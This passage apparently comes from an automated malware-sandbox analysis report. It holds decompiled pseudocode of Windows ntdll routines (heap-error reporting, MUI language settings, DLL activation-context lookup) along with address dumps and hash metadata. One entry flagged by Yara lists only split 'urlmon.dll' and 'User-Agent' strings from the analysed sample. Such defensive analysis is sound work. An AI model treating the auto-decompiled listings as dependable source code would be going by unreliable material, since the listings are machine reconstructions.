					E0122B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x131589c);
				E0122B150("Heap error detected at %p (heap handle %p)\n",  *0x13158a0);
				_t27 =  *0x1315898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M012E1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0122B150();
				} else {
					E0122B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0122B150("Error code: %d - %s\n",  *0x1315898);
				_t113 =  *0x13158a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0122B150();
					} else {
						E0122B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0122B150("Parameter1: %p\n",  *0x13158a4);
				}
				_t115 =  *0x13158a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0122B150();
					} else {
						E0122B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0122B150("Parameter2: %p\n",  *0x13158a8);
				}
				_t117 =  *0x13158ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0122B150();
					} else {
						E0122B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0122B150("Parameter3: %p\n",  *0x13158ac);
				}
				_t119 =  *0x13158b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0122B150();
					} else {
						E0122B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x13158b4);
					E0122B150("Last known valid blocks: before - %p, after - %p\n",  *0x13158b0);
				} else {
					_t120 =  *0x13158b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0122B150();
				} else {
					E0122B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0122B150("Stack trace available at %p\n", 0x13158c0);
			}











                                            0x012e1c10
                                            0x012e1c16
                                            0x012e1c1e
                                            0x012e1c3d
                                            0x012e1c3e
                                            0x012e1c20
                                            0x012e1c35
                                            0x012e1c3a
                                            0x012e1c44
                                            0x012e1c55
                                            0x012e1c5a
                                            0x012e1c65
                                            0x012e1c67
                                            0x00000000
                                            0x012e1c6e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x012e1c67
                                            0x012e1cdc
                                            0x012e1ce5
                                            0x012e1d04
                                            0x012e1d05
                                            0x012e1ce7
                                            0x012e1cfc
                                            0x012e1d01
                                            0x012e1d0b
                                            0x012e1d17
                                            0x012e1d1f
                                            0x012e1d25
                                            0x012e1d30
                                            0x012e1d4f
                                            0x012e1d50
                                            0x012e1d32
                                            0x012e1d47
                                            0x012e1d4c
                                            0x012e1d61
                                            0x012e1d67
                                            0x012e1d68
                                            0x012e1d6e
                                            0x012e1d79
                                            0x012e1d98
                                            0x012e1d99
                                            0x012e1d7b
                                            0x012e1d90
                                            0x012e1d95
                                            0x012e1daa
                                            0x012e1db0
                                            0x012e1db1
                                            0x012e1db7
                                            0x012e1dc2
                                            0x012e1de1
                                            0x012e1de2
                                            0x012e1dc4
                                            0x012e1dd9
                                            0x012e1dde
                                            0x012e1df3
                                            0x012e1df9
                                            0x012e1dfa
                                            0x012e1e00
                                            0x012e1e0a
                                            0x012e1e13
                                            0x012e1e32
                                            0x012e1e33
                                            0x012e1e15
                                            0x012e1e2a
                                            0x012e1e2f
                                            0x012e1e39
                                            0x012e1e4a
                                            0x012e1e02
                                            0x012e1e02
                                            0x012e1e08
                                            0x00000000
                                            0x00000000
                                            0x012e1e08
                                            0x012e1e5b
                                            0x012e1e7a
                                            0x012e1e7b
                                            0x012e1e5d
                                            0x012e1e72
                                            0x012e1e77
                                            0x012e1e95

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                            • API String ID: 0-2897834094
                                            • Opcode ID: 68c970387123ca09abac3602eedd1bc620e60c202b21f7b3a30156a666f1f118
                                            • Instruction ID: b642228d5f0d5a90ced1ad6341ce5983419c39aa87b7e63550df8c0d41803a0e
                                            • Opcode Fuzzy Hash: 68c970387123ca09abac3602eedd1bc620e60c202b21f7b3a30156a666f1f118
                                            • Instruction Fuzzy Hash: 6761E933631155EFD312EB89D88DE3477E4EB15A30B9A807EFD099B345D6749CA08B0A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00415760, Relevance: 10.1, Strings: 8, Instructions: 127COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: Us$: $er-A$gent$ll$on.d$urlm$urlmon.dll
                                            • API String ID: 0-586467556
                                            • Opcode ID: 40e026cd32226a9130025487f97dbf8064262f73dee17c37a06b87673894670c
                                            • Instruction ID: d5422d959feb4dac0243d8b577787a05296b07f91b311dbb86e173e3e73025a5
                                            • Opcode Fuzzy Hash: 40e026cd32226a9130025487f97dbf8064262f73dee17c37a06b87673894670c
                                            • Instruction Fuzzy Hash: 8931EF32D045189ADB01EF65D8427FEFB78EF86324F204247D854AB102D7398E52C7EA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01233D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 96%
                                            			E01233D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E01231B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L012477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E01231B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L012477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E01231B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E01231B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E01231B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L012477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L012477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L01244620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0126F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01271370(_t276, 0x1204e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0126BB40(0,  &_v68, _t170);
									if(L012343C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L012477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L012477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0126BB40(_t257,  &_v68, _t243);
								if(L012343C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01271370(_t278, 0x1204e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L01244620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0126F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01271370(_v16, 0x1204e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0126BB40(_t262,  &_v68, _t244);
								if(L012343C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01271370(_t282, 0x1204e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0126BB40(_t262,  &_v68, _t201);
							if(L012343C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L012477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L012477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L01244620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0126F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01271370(_t280, 0x1204e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0126BB40(_t267,  &_v68, _t245);
							if(L012343C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01271370(_t284, 0x1204e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0126BB40(_t267,  &_v68, _t224);
						if(L012343C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L012477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L012477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                            0x01233d3c
                                            0x01233d42
                                            0x01233d44
                                            0x01233d46
                                            0x01233d49
                                            0x01233d4c
                                            0x01233d4f
                                            0x01233d52
                                            0x01233d55
                                            0x01233d58
                                            0x01233d5b
                                            0x01233d5f
                                            0x01233d61
                                            0x01233d66
                                            0x01288213
                                            0x01288218
                                            0x01234085
                                            0x01234088
                                            0x0123408e
                                            0x01234094
                                            0x0123409a
                                            0x012340a0
                                            0x012340a6
                                            0x012340a9
                                            0x012340af
                                            0x012340b6
                                            0x012340bd
                                            0x012340bd
                                            0x01233d83
                                            0x0128821f
                                            0x01288229
                                            0x01288238
                                            0x01288238
                                            0x0128823d
                                            0x0128823d
                                            0x01233da0
                                            0x01233daf
                                            0x01233db5
                                            0x01233dba
                                            0x01233dba
                                            0x01233dd4
                                            0x01233e94
                                            0x01233eab
                                            0x01233f6d
                                            0x01233f84
                                            0x0123406b
                                            0x0123406b
                                            0x0123406e
                                            0x0123406e
                                            0x01234070
                                            0x01234074
                                            0x01288351
                                            0x01288351
                                            0x0123407a
                                            0x0123407f
                                            0x0128835d
                                            0x01288370
                                            0x01288377
                                            0x01288379
                                            0x0128837c
                                            0x0128837c
                                            0x0128835d
                                            0x00000000
                                            0x0123407f
                                            0x01233f8a
                                            0x01233f8d
                                            0x01233f90
                                            0x01233f95
                                            0x0128830d
                                            0x0128830f
                                            0x01233f9b
                                            0x01233fac
                                            0x01233fae
                                            0x01233fb1
                                            0x01233fb1
                                            0x01233fb6
                                            0x01288317
                                            0x0128831a
                                            0x00000000
                                            0x01233fbc
                                            0x01233fc1
                                            0x01233fc9
                                            0x01233fd7
                                            0x01233fda
                                            0x01233fdd
                                            0x01234021
                                            0x01234021
                                            0x01234029
                                            0x01234030
                                            0x01234044
                                            0x01234046
                                            0x01234046
                                            0x01234044
                                            0x01234049
                                            0x01288327
                                            0x01288334
                                            0x01288339
                                            0x0128833c
                                            0x0123404f
                                            0x0123404f
                                            0x0123404f
                                            0x01234051
                                            0x01234056
                                            0x01234063
                                            0x01234063
                                            0x01234068
                                            0x00000000
                                            0x01234068
                                            0x01233fdf
                                            0x01233fe2
                                            0x01233fe4
                                            0x01233fe7
                                            0x01233fef
                                            0x01234003
                                            0x01234005
                                            0x01234005
                                            0x0123400c
                                            0x01234013
                                            0x01234016
                                            0x01234017
                                            0x0123401b
                                            0x0123401e
                                            0x00000000
                                            0x0123401e
                                            0x01233fb6
                                            0x01233eb1
                                            0x01233eb4
                                            0x01233eb7
                                            0x01233ebc
                                            0x012882a9
                                            0x012882ab
                                            0x01233ec2
                                            0x01233ed3
                                            0x01233ed5
                                            0x01233ed8
                                            0x01233ed8
                                            0x01233edd
                                            0x012882b3
                                            0x012882b6
                                            0x00000000
                                            0x01233ee3
                                            0x01233ee8
                                            0x01233eed
                                            0x01233ef0
                                            0x01233ef3
                                            0x01233f02
                                            0x01233f05
                                            0x01233f08
                                            0x012882c0
                                            0x012882c3
                                            0x012882c5
                                            0x012882c8
                                            0x012882d0
                                            0x012882e4
                                            0x012882e6
                                            0x012882e6
                                            0x012882ed
                                            0x012882f4
                                            0x012882f7
                                            0x012882f8
                                            0x012882fc
                                            0x012882ff
                                            0x012882ff
                                            0x01233f0e
                                            0x01233f11
                                            0x01233f16
                                            0x01233f1d
                                            0x01233f31
                                            0x01288307
                                            0x01288307
                                            0x01233f31
                                            0x01233f39
                                            0x01233f48
                                            0x01233f4d
                                            0x01233f50
                                            0x01233f50
                                            0x01233f53
                                            0x01233f58
                                            0x01233f65
                                            0x01233f65
                                            0x01233f6a
                                            0x00000000
                                            0x01233f6a
                                            0x01233edd
                                            0x01233dda
                                            0x01233ddd
                                            0x01233de0
                                            0x01233de5
                                            0x01288245
                                            0x01233deb
                                            0x01233df7
                                            0x01233dfc
                                            0x01233dfe
                                            0x01233e01
                                            0x01233e01
                                            0x01233e06
                                            0x0128824d
                                            0x0128824f
                                            0x01288254
                                            0x00000000
                                            0x01233e0c
                                            0x01233e11
                                            0x01233e16
                                            0x01233e19
                                            0x01233e29
                                            0x01233e2c
                                            0x01233e2f
                                            0x0128825c
                                            0x0128825f
                                            0x01288261
                                            0x01288264
                                            0x0128826c
                                            0x01288280
                                            0x01288282
                                            0x01288282
                                            0x01288289
                                            0x01288290
                                            0x01288293
                                            0x01288294
                                            0x01288298
                                            0x0128829b
                                            0x0128829b
                                            0x01233e35
                                            0x01233e38
                                            0x01233e3d
                                            0x01233e44
                                            0x01233e58
                                            0x012882a3
                                            0x012882a3
                                            0x01233e58
                                            0x01233e60
                                            0x01233e6f
                                            0x01233e74
                                            0x01233e77
                                            0x01233e77
                                            0x01233e7a
                                            0x01233e7f
                                            0x01233e8c
                                            0x01233e8c
                                            0x01233e91
                                            0x00000000
                                            0x01233e91

                                            Strings
                                            • Kernel-MUI-Language-SKU, xrefs: 01233F70
                                            • Kernel-MUI-Number-Allowed, xrefs: 01233D8C
                                            • WindowsExcludedProcs, xrefs: 01233D6F
                                            • Kernel-MUI-Language-Allowed, xrefs: 01233DC0
                                            • Kernel-MUI-Language-Disallowed, xrefs: 01233E97
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                            • API String ID: 0-258546922
                                            • Opcode ID: 7967c4363bc69cccf21656c822b311badc547788df1d3f2b6d3f0f20944a5bbb
                                            • Instruction ID: b9c9232cf04b4d92ba7dbfd2a1d53f3f1036cd37bbc899b52d187f7c26366758
                                            • Opcode Fuzzy Hash: 7967c4363bc69cccf21656c822b311badc547788df1d3f2b6d3f0f20944a5bbb
                                            • Instruction Fuzzy Hash: 70F194B2D2125AEFCB15EF98C980DEEBBB9FF58650F14015AE605E7250E7749E00CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01258E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 44%
                                            			E01258E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x131d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1318464; // 0x73b80110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1315780 & 0x00000003) != 0) {
							E012A5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1315780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0126B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1317984; // 0xdc2b20
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1318464; // 0x73b80110
					 *0x131b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E01259B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1315780 & 0x00000005) != 0) {
						_push(_t49);
						E012A5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                            0x01258e0f
                                            0x01258e16
                                            0x01258e19
                                            0x01258e1b
                                            0x01258e21
                                            0x01258e7f
                                            0x01258e85
                                            0x01299354
                                            0x0129936c
                                            0x01299371
                                            0x0129937b
                                            0x01299381
                                            0x01299381
                                            0x0129937b
                                            0x01258e9d
                                            0x01258e9d
                                            0x01258e29
                                            0x01258e2c
                                            0x01258e38
                                            0x01258e3e
                                            0x01258e43
                                            0x01258eb5
                                            0x01258eb9
                                            0x012992aa
                                            0x012992af
                                            0x012992e8
                                            0x012992e8
                                            0x012992af
                                            0x01258eb9
                                            0x01258e45
                                            0x01258e53
                                            0x01258e5b
                                            0x01258e5f
                                            0x01258e78
                                            0x01258e78
                                            0x01258e7d
                                            0x01258ec3
                                            0x01258ecd
                                            0x01258ed2
                                            0x01258ed2
                                            0x01258ec5
                                            0x01258ec5
                                            0x00000000
                                            0x01258e7d
                                            0x01258e67
                                            0x01258ea4
                                            0x0129931a
                                            0x00000000
                                            0x00000000
                                            0x01299320
                                            0x01258ea4
                                            0x01258e70
                                            0x01299325
                                            0x01299340
                                            0x01299345
                                            0x01299345
                                            0x01258e76
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000

                                            Strings
                                            • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0129932A
                                            • LdrpFindDllActivationContext, xrefs: 01299331, 0129935D
                                            • minkernel\ntdll\ldrsnap.c, xrefs: 0129933B, 01299367
                                            • Querying the active activation context failed with status 0x%08lx, xrefs: 01299357
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                            • API String ID: 0-3779518884
                                            • Opcode ID: e51d5f414a3b041fe5c397d98593205f9a3aecc3a4aa4470b5729ba120afe998
                                            • Instruction ID: aaf43cc682242a95e3367a16ebf2611fde7db8c1ec70d526e7598cf02673a379
                                            • Opcode Fuzzy Hash: e51d5f414a3b041fe5c397d98593205f9a3aecc3a4aa4470b5729ba120afe998
                                            • Instruction Fuzzy Hash: 1A412831A303129FEFB2AB0E98C9A35B6B5AB05314F064569FF0497092E7F05DC09381
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01238794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 83%
                                            			E01238794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0123934A() != 0) {
								_t159 = E012AA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x1315780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E012A5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x1315780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0123849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
